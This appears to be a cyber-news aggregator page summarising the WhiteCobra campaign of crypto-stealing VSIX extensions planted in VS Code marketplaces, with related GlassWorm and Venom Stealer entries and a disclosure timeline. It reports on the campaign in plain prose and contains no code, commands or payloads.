Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

WhiteCobra malicious VSIX extension campaign

Campaign
First reported
Last updated
Happening score
H score 47
1 unique sources, 1 articles

Summary

Hide ▲

WhiteCobra is running an ongoing malicious extension campaign that plants crypto-stealing VSIX extensions in major editor marketplaces, putting VSCode, Cursor, and Windsurf users at risk. The operation abuses the Visual Studio marketplace and Open VSX registry to reach victims at scale. On Windows, the chain can launch LummaStealer to harvest wallet data and browser credentials. The group keeps replacing removed listings, showing fast operational resilience and continued exposure for users.

Related Happenings

GlassWorm OpenVSX sleeper extension campaign

Campaign
First: 28.04.2026 00:41 Last: 28.04.2026 00:41 Sources 1

About this happening: The **GlassWorm** operation has launched a **new wave** against **OpenVSX**, seeding **73 sleeper extensions** that become malicious after an **update** and can deliver malware to...

Open Happening

GlassWorm v2 cloned VS Code extension loaders

Malware Activity
First: 27.04.2026 14:23 Last: 27.04.2026 14:23 Sources 1

About this happening: The **GlassWorm v2** malware activity now uses **cloned VS Code extensions** on **Open VSX** to deliver payloads that steal credentials, deploy a **RAT**, and spread across multip...

Open Happening

GlassWorm Zig dropper infecting developer IDEs

Malware Activity
First: 10.04.2026 16:23 Last: 10.04.2026 16:23 Sources 1

About this happening: The **GlassWorm** malware set now uses a **Zig dropper** that can silently infect **all VS Code-based IDEs** on a developer's machine, widening the reach of the compromise. The pa...

Open Happening

Venom Stealer MaaS continuous credential theft and exfiltration

Malware Activity
First: 01.04.2026 16:30 Last: 01.04.2026 16:30 Sources 1

About this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...

Open Happening

GlassWorm multi-stage data-theft malware evolution

Malware Activity
First: 25.03.2026 16:26 Last: 25.03.2026 16:26 Sources 1

About this happening: The **GlassWorm** malware family has evolved into a **multi-stage** payload chain that steals browser data and crypto-wallet information, increasing risk for **Windows** and **mac...

Open Happening

Timeline

  1. 13.09.2025 17:00 2 articles · 8mo ago

    WhiteCobra malicious extension campaign targets VSCode, Cursor, and Windsurf users

    Initial Disclosure

    WhiteCobra targets VSCode, Cursor, and Windsurf users by planting 24 malicious VSIX extensions in the Visual Studio marketplace and the Open VSX registry, using lookalike Solidity and crypto-development listings with inflated download counts and professionally styled descriptions. Koi Security says the extensions start from extension.js, defer to prompt.js, fetch a second-stage payload from Claudflare Pages, and on Windows can launch LummaStealer to steal cryptocurrency wallet data, browser credentials, and messaging app data; core Ethereum developer Zak Cole said his Cursor wallet was drained after installing contractshark.solidity-lang.

    Show sources
    Open in new tab